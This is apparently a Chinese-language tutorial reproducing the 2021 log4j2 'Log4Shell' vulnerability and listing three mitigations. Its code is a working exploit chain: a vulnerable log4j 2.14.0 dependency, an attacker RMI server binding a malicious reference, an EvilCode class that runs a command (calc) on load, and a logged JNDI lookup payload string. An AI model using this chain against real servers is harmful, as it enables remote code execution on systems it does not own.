2021-12-10日左右,java的log4j框架出現了一個大漏洞,對服務器案例引起了不小的影響,當然只對於log4j的日志使用者來說,如果你是spring框架,用的是logback,不存在這個問題。
RMI和JNDI
- RMI(Remote Method Invocation) 即Java遠程方法調用,一種用於實現遠程過程調用的應用程序編程接口
- JNDI (Java Naming and Directory Interface)是一個應用程序設計的API,為開發人員提供了查找和訪問各種命名和目錄服務的通用、統一的接口
- JNDI和RMI的主要關系是RMI注冊的服務可以通過JNDIAPI訪問。在討論到Spring反序列化漏洞之前,先看看如果通過JNDI來調用RMI注冊的服務。
模擬漏洞重現
- pom依賴
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
<exclusions>
<exclusion>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-logging</artifactId>
</exclusion>
</exclusions>
</dependency>
<!--log4j2核心包-->
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-api</artifactId>
<version>2.14.0</version>
</dependency>
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.14.0</version>
</dependency>
- 黑客端
/**
* 構建RMI服務來響應惡意代碼
* <p>
* Java RMI,即 遠程方法調用(Remote Method Invocation),一種用於實現遠程過程調用(RPC)的Java API, 能直接傳輸序列化后的Java對象和分布式垃圾收集。它的實現依賴於(JVM),因此它僅支持從一個JVM到另一個JVM的調用。
*/
public class RMIServer {
@SneakyThrows
public static void main(String... args) {
try {
// 本地主機上的遠程對象注冊表Registry的實例,默認端口1099
LocateRegistry.createRegistry(1099);
Registry registry = LocateRegistry.getRegistry();
System.out.println("Create RMI registry on port 1099");
//返回的Java對象
Reference reference = new Reference("bug.EvilCode", "bug.EvilCode", null);
ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
// 把遠程對象注冊到RMI注冊服務器上,並命名為evil
registry.bind("evil", referenceWrapper);
} catch (RemoteException | AlreadyBoundException | NamingException e) {
e.printStackTrace();
}
}
/**
* 執行任意的腳本,目前的腳本會使windows服務器打開計算器.
*/
public class EvilCode {
static {
System.out.println("受害服務器將執行下面命令行");
Process p;
String[] cmd = {"calc"};
try {
p = Runtime.getRuntime().exec(cmd);
InputStream fis = p.getInputStream();
InputStreamReader isr = new InputStreamReader(fis);
BufferedReader br = new BufferedReader(isr);
String line = null;
while ((line = br.readLine()) != null) {
System.out.println(line);
}
} catch (IOException e) {
e.printStackTrace();
}
}
}
- 網站端
public class Server {
private static final Logger logger = LogManager.getLogger();
public static void main(String[] args) {
String name = "${java:runtime}";
logger.info("name:{}", name);
//模擬填寫數據,輸入構造好的字符串,使受害服務器打印日志時執行遠程的代碼 同一台可以使用127.0.0.1
String username = "${jndi:rmi://127.0.0.1:1099/evil}";
//正常打印業務日志
logger.error("username:{}", username);
}
}
【緊急補救措施3選1】
- 修改 JVM 參數 -Dlog4j2.formatMsgNoLookups=true
- 修改配置 log4j2.formatMsgNoLookups=True
- 將系統環境變量 FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 設置為 true